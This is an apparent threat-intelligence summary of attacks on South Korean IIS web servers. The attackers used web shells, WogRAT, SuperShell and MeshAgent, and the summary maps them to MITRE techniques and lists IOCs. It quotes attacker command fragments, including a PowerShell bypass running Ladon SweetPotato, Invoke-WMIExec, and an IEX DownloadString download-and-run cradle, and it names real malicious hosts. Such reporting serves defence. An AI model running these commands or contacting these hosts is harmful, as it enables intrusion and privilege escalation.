Attacks targeting South Korean web servers exploited file upload vulnerabilities to deploy web shells and additional malware, including WogRAT, SuperShell, and MeshAgent, affecting both Windows and Linux systems. The attacker demonstrated techniques for persistence, discovery, privilege escalation, credential access, and lateral movement across organizational networks. #WogRAT #SuperShell #MeshAgent #Ladon #Fscan
Keypoints
- Attackers exploited file upload vulnerabilities on Korean IIS web servers to install web shells such as Chopper, Godzilla, and ReGe-ORG for initial access and persistence.
- ELF-based malware and Windows PE malware were distributed together, indicating targeting of both Linux and Windows systems.
- Backdoor malware WogRAT, developed referencing Tiny SHell, was used with its C&C server matching past aNotepad exploitation cases, suggesting the same attacker.
- Tools like Ladon and PowerLadon were used for privilege escalation, scanning, and stealing credential information.
- Attackers employed SuperShell and MeshAgent for command and control, enabling remote control, file transfer, and web-based remote desktop on multiple platforms.
- Lateral movement was conducted using WMIExec, Ladon, and stolen NT hashes to access additional systems including MS-SQL Servers in the network.
- The attack sequence reveals a sophisticated operation potentially linked to Chinese-speaking threat actors, with goals possibly including data theft or ransomware deployment.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Web shells installed via file upload vulnerabilities on IIS servers (“the attack exploited file upload vulnerabilities of the web server”).
- [T1059] Command and Scripting Interpreter – Use of PowerShell scripts and commands for execution and privilege escalation (“powershell -exec bypass Import-Module .Ladon.ps1;Ladon SweetPotato whoami”).
- [T1078] Valid Accounts – Theft and use of NT hashes and credentials to move laterally using WMIExec and Ladon (“attacker successfully obtained the NT hash of an admin account and used it to move laterally”).
- [T1021] Remote Services – Use of WMIExec and MS-SQL for lateral movement across the network (“Invoke-WMIExec -Target … -Command ‘whoami’”).
- [T1105] Ingress Tool Transfer – Downloading malware and tools such as Invoke-WMIExec.ps1 and Ladon modules from attacker-controlled servers (“IEX (New-Object Net.WebClient).DownloadString…”).
- [T1071] Application Layer Protocol – Use of SuperShell and MeshAgent for remote control and command execution over network protocols (“SuperShell … supports a reverse shell, allowing remote control”).
Indicators of Compromise
- [MD5] Malware file hashes – 06ebef1f7cc6fb21f8266f8c9f9ae2d9, 3f6211234c0889142414f7b579d43c38, and 3 more hashes.
- [URL] Malicious download hosts – http://139.180.142.127/Invoke-WMIExec.ps1, http://45.76.219.39/bb, and others.
- [FQDN] Command and Control domain – linuxwork.net used for managing malware operations.
- [IP addresses] Involved in command and control and malware distribution – 108.61.247.121, 66.42.113.183, 139.180.142.127 among others.
Read more: https://asec.ahnlab.com/en/88627/